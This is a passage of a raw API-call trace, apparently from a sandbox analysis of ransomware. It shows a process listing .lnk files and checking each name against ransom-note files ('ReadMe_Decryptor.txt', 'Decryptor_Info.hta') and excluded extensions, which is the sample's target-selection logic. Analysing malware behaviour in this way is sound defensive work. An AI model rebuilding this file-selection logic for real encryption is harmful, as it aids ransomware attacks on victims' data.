(lpString1="ljV0AFrtFxxFy9Liq.lnk", lpString2="..") returned 1 [0084.763] lstrcmpiW (lpString1="ljV0AFrtFxxFy9Liq.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.763] lstrcmpiW (lpString1="ljV0AFrtFxxFy9Liq.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.763] PathFindExtensionW (pszPath="ljV0AFrtFxxFy9Liq.lnk") returned=".lnk" [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.763] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf09c6c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ff9820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ff9820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x9bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="LsW7lRCT6zx_PUxqXz.lnk", cAlternateFileName="LSW7LR~1.LNK")) returned 1 [0084.763] lstrcmpW (lpString1="LsW7lRCT6zx_PUxqXz.lnk", lpString2=".") returned 1 [0084.763] lstrcmpW (lpString1="LsW7lRCT6zx_PUxqXz.lnk", lpString2="..") returned 1 [0084.763] lstrcmpiW (lpString1="LsW7lRCT6zx_PUxqXz.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.763] lstrcmpiW (lpString1="LsW7lRCT6zx_PUxqXz.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.763] PathFindExtensionW (pszPath="LsW7lRCT6zx_PUxqXz.lnk") returned=".lnk" [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.763] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c415c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4c415c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4c415c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x415, dwReserved0=0x0, dwReserved1=0x0, cFileName="LYE6oZz iVeG5QNBY.lnk", cAlternateFileName="LYE6OZ~1.LNK")) returned 1 [0084.764] lstrcmpW (lpString1="LYE6oZz iVeG5QNBY.lnk", lpString2=".") returned 1 [0084.764] lstrcmpW (lpString1="LYE6oZz iVeG5QNBY.lnk", lpString2="..") returned 1 [0084.764] lstrcmpiW (lpString1="LYE6oZz iVeG5QNBY.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.764] lstrcmpiW (lpString1="LYE6oZz iVeG5QNBY.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.764] PathFindExtensionW (pszPath="LYE6oZz iVeG5QNBY.lnk") returned=".lnk" [0084.764] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.764] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.764] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.764] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f9c0e0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3f9c0e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3f9c0e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="l_BCBt53g.lnk", cAlternateFileName="L_BCBT~1.LNK")) returned 1 [0084.764] lstrcmpW (lpString1="l_BCBt53g.lnk", lpString2=".") returned 1 [0084.764] lstrcmpW (lpString1="l_BCBt53g.lnk", lpString2="..") returned 1 [0084.764] lstrcmpiW (lpString1="l_BCBt53g.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.764] lstrcmpiW (lpString1="l_BCBt53g.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.764] PathFindExtensionW (pszPath="l_BCBt53g.lnk") returned=".lnk" [0084.764] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.764] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.764] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.764] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f4fe20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3f4fe20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3f4fe20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1981, dwReserved0=0x0, dwReserved1=0x0, cFileName="mgEq0F12.lnk", cAlternateFileName="")) returned 1 [0084.764] lstrcmpW (lpString1="mgEq0F12.lnk", lpString2=".") returned 1 [0084.764] lstrcmpW (lpString1="mgEq0F12.lnk", lpString2="..") returned 1 [0084.764] lstrcmpiW (lpString1="mgEq0F12.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.764] lstrcmpiW (lpString1="mgEq0F12.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.764] PathFindExtensionW (pszPath="mgEq0F12.lnk") returned=".lnk" [0084.764] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.765] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4a2c280, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4a2c280, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4a2c280, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x14b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MLkuANEY5PGFGUkw2uF0.lnk", cAlternateFileName="MLKUAN~1.LNK")) returned 1 [0084.765] lstrcmpW (lpString1="MLkuANEY5PGFGUkw2uF0.lnk", lpString2=".") returned 1 [0084.765] lstrcmpW (lpString1="MLkuANEY5PGFGUkw2uF0.lnk", lpString2="..") returned 1 [0084.765] lstrcmpiW (lpString1="MLkuANEY5PGFGUkw2uF0.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.765] lstrcmpiW (lpString1="MLkuANEY5PGFGUkw2uF0.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.765] PathFindExtensionW (pszPath="MLkuANEY5PGFGUkw2uF0.lnk") returned=".lnk" [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.765] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe501f980, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe501f980, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe501f980, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x221, dwReserved0=0x0, dwReserved1=0x0, cFileName="Msox.ots.lnk", cAlternateFileName="MSOXOT~1.LNK")) returned 1 [0084.765] lstrcmpW (lpString1="Msox.ots.lnk", lpString2=".") returned 1 [0084.765] lstrcmpW (lpString1="Msox.ots.lnk", lpString2="..") returned 1 [0084.765] lstrcmpiW (lpString1="Msox.ots.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.765] lstrcmpiW (lpString1="Msox.ots.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.765] PathFindExtensionW (pszPath="Msox.ots.lnk") returned=".lnk" [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.765] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.765] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0381560, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe458f7e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe458f7e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x52a, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Music.lnk", cAlternateFileName="MYMUSI~1.LNK")) returned 1 [0084.765] lstrcmpW (lpString1="My Music.lnk", lpString2=".") returned 1 [0084.766] lstrcmpW (lpString1="My Music.lnk", lpString2="..") returned 1 [0084.766] lstrcmpiW (lpString1="My Music.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.766] lstrcmpiW (lpString1="My Music.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.766] PathFindExtensionW (pszPath="My Music.lnk") returned=".lnk" [0084.766] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.766] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.766] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.766] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2925140, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4d720c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4d720c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x54f, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Pictures.lnk", cAlternateFileName="MYPICT~1.LNK")) returned 1 [0084.766] lstrcmpW (lpString1="My Pictures.lnk", lpString2=".") returned 1 [0084.766] lstrcmpW (lpString1="My Pictures.lnk", lpString2="..") returned 1 [0084.766] lstrcmpiW (lpString1="My Pictures.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.766] lstrcmpiW (lpString1="My Pictures.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.766] PathFindExtensionW (pszPath="My Pictures.lnk") returned=".lnk" [0084.766] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.766] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.766] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.766] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf5d16e0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ff9820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ff9820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x539, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Videos.lnk", cAlternateFileName="MYVIDE~1.LNK")) returned 1 [0084.766] lstrcmpW (lpString1="My Videos.lnk", lpString2=".") returned 1 [0084.766] lstrcmpW (lpString1="My Videos.lnk", lpString2="..") returned 1 [0084.766] lstrcmpiW (lpString1="My Videos.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.766] lstrcmpiW (lpString1="My Videos.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.766] PathFindExtensionW (pszPath="My Videos.lnk") returned=".lnk" [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.767] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ba9040, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ba9040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ba9040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf71, dwReserved0=0x0, dwReserved1=0x0, cFileName="MY5h2w Zql7liGw mDEf.lnk", cAlternateFileName="MY5H2W~1.LNK")) returned 1 [0084.767] lstrcmpW (lpString1="MY5h2w Zql7liGw mDEf.lnk", lpString2=".") returned 1 [0084.767] lstrcmpW (lpString1="MY5h2w Zql7liGw mDEf.lnk", lpString2="..") returned 1 [0084.767] lstrcmpiW (lpString1="MY5h2w Zql7liGw mDEf.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.767] lstrcmpiW (lpString1="MY5h2w Zql7liGw mDEf.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.767] PathFindExtensionW (pszPath="MY5h2w Zql7liGw mDEf.lnk") returned=".lnk" [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.767] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47f0de0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe47f0de0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe47f0de0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x3e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="nEi dQUS.lnk", cAlternateFileName="NEIDQU~1.LNK")) returned 1 [0084.767] lstrcmpW (lpString1="nEi dQUS.lnk", lpString2=".") returned 1 [0084.767] lstrcmpW (lpString1="nEi dQUS.lnk", lpString2="..") returned 1 [0084.767] lstrcmpiW (lpString1="nEi dQUS.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.767] lstrcmpiW (lpString1="nEi dQUS.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.767] PathFindExtensionW (pszPath="nEi dQUS.lnk") returned=".lnk" [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.767] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.767] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4118ea0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4118ea0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4118ea0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xfa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="nGXMZ-y0tz-YPZqFq2.lnk", cAlternateFileName="NGXMZ-~1.LNK")) returned 1 [0084.768] lstrcmpW (lpString1="nGXMZ-y0tz-YPZqFq2.lnk", lpString2=".") returned 1 [0084.768] lstrcmpW (lpString1="nGXMZ-y0tz-YPZqFq2.lnk", lpString2="..") returned 1 [0084.768] lstrcmpiW (lpString1="nGXMZ-y0tz-YPZqFq2.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.768] lstrcmpiW (lpString1="nGXMZ-y0tz-YPZqFq2.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.768] PathFindExtensionW (pszPath="nGXMZ-y0tz-YPZqFq2.lnk") returned=".lnk" [0084.768] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.768] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.768] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.768] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1157540, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe1157540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe11c9960, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="nPBObvG51sSTj.lnk", cAlternateFileName="NPBOBV~1.LNK")) returned 1 [0084.768] lstrcmpW (lpString1="nPBObvG51sSTj.lnk", lpString2=".") returned 1 [0084.768] lstrcmpW (lpString1="nPBObvG51sSTj.lnk", lpString2="..") returned 1 [0084.768] lstrcmpiW (lpString1="nPBObvG51sSTj.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.768] lstrcmpiW (lpString1="nPBObvG51sSTj.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.768] PathFindExtensionW (pszPath="nPBObvG51sSTj.lnk") returned=".lnk" [0084.768] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.768] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.768] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.768] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3edda00, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3edda00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3edda00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x141d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntTbJNr.lnk", cAlternateFileName="")) returned 1 [0084.768] lstrcmpW (lpString1="ntTbJNr.lnk", lpString2=".") returned 1 [0084.768] lstrcmpW (lpString1="ntTbJNr.lnk", lpString2="..") returned 1 [0084.768] lstrcmpiW (lpString1="ntTbJNr.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.768] lstrcmpiW (lpString1="ntTbJNr.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.769] PathFindExtensionW (pszPath="ntTbJNr.lnk") returned=".lnk" [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.769] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4484e40, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4484e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4484e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x239, dwReserved0=0x0, dwReserved1=0x0, cFileName="Nv6hON99.lnk", cAlternateFileName="")) returned 1 [0084.769] lstrcmpW (lpString1="Nv6hON99.lnk", lpString2=".") returned 1 [0084.769] lstrcmpW (lpString1="Nv6hON99.lnk", lpString2="..") returned 1 [0084.769] lstrcmpiW (lpString1="Nv6hON99.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.769] lstrcmpiW (lpString1="Nv6hON99.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.769] PathFindExtensionW (pszPath="Nv6hON99.lnk") returned=".lnk" [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.769] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4165160, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4165160, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe418b2c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="nwhNds84oriBnceLbT.ots.lnk", cAlternateFileName="NWHNDS~1.LNK")) returned 1 [0084.769] lstrcmpW (lpString1="nwhNds84oriBnceLbT.ots.lnk", lpString2=".") returned 1 [0084.769] lstrcmpW (lpString1="nwhNds84oriBnceLbT.ots.lnk", lpString2="..") returned 1 [0084.769] lstrcmpiW (lpString1="nwhNds84oriBnceLbT.ots.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.769] lstrcmpiW (lpString1="nwhNds84oriBnceLbT.ots.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.769] PathFindExtensionW (pszPath="nwhNds84oriBnceLbT.ots.lnk") returned=".lnk" [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.769] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.770] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.770] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41b1420, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe41b1420, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe41b1420, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x0, dwReserved1=0x0, cFileName="O -DVNns.mkv.lnk", cAlternateFileName="O-DVNN~1.LNK")) returned 1 [0084.770] lstrcmpW (lpString1="O -DVNns.mkv.lnk", lpString2=".") returned 1 [0084.770] lstrcmpW (lpString1="O -DVNns.mkv.lnk", lpString2="..") returned 1 [0084.770] lstrcmpiW (lpString1="O -DVNns.mkv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.770] lstrcmpiW (lpString1="O -DVNns.mkv.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.770] PathFindExtensionW (pszPath="O -DVNns.mkv.lnk") returned=".lnk" [0084.770] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.770] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.770] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.770] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2ac8060, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe2ac8060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2ac8060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="o6I2pPx4Jyk.lnk", cAlternateFileName="O6I2PP~1.LNK")) returned 1 [0084.770] lstrcmpW (lpString1="o6I2pPx4Jyk.lnk", lpString2=".") returned 1 [0084.770] lstrcmpW (lpString1="o6I2pPx4Jyk.lnk", lpString2="..") returned 1 [0084.770] lstrcmpiW (lpString1="o6I2pPx4Jyk.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.770] lstrcmpiW (lpString1="o6I2pPx4Jyk.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.770] PathFindExtensionW (pszPath="o6I2pPx4Jyk.lnk") returned=".lnk" [0084.770] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.770] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.770] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.771] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b82ee0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4b82ee0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4b82ee0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x2681, dwReserved0=0x0, dwReserved1=0x0, cFileName="o7_4kYcuMGpVw7fWhX.lnk", cAlternateFileName="O7_4KY~1.LNK")) returned 1 [0084.771] lstrcmpW (lpString1="o7_4kYcuMGpVw7fWhX.lnk", lpString2=".") returned 1 [0084.771] lstrcmpW (lpString1="o7_4kYcuMGpVw7fWhX.lnk", lpString2="..") returned 1 [0084.771] lstrcmpiW (lpString1="o7_4kYcuMGpVw7fWhX.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.771] lstrcmpiW (lpString1="o7_4kYcuMGpVw7fWhX.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.771] PathFindExtensionW (pszPath="o7_4kYcuMGpVw7fWhX.lnk") returned=".lnk" [0084.771] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.771] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.771] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.771] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4993d00, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ec8d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ec8d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1908, dwReserved0=0x0, dwReserved1=0x0, cFileName="oAemNaE.lnk", cAlternateFileName="")) returned 1 [0084.771] lstrcmpW (lpString1="oAemNaE.lnk", lpString2=".") returned 1 [0084.771] lstrcmpW (lpString1="oAemNaE.lnk", lpString2="..") returned 1 [0084.771] lstrcmpiW (lpString1="oAemNaE.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.771] lstrcmpiW (lpString1="oAemNaE.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.771] PathFindExtensionW (pszPath="oAemNaE.lnk") returned=".lnk" [0084.771] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.771] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.771] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.771] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c67720, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4c67720, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4c67720, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="odea63GEmLe0lrnp.lnk", cAlternateFileName="ODEA63~1.LNK")) returned 1 [0084.771] lstrcmpW (lpString1="odea63GEmLe0lrnp.lnk", lpString2=".") returned 1 [0084.771] lstrcmpW (lpString1="odea63GEmLe0lrnp.lnk", lpString2="..") returned 1 [0084.771] lstrcmpiW (lpString1="odea63GEmLe0lrnp.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 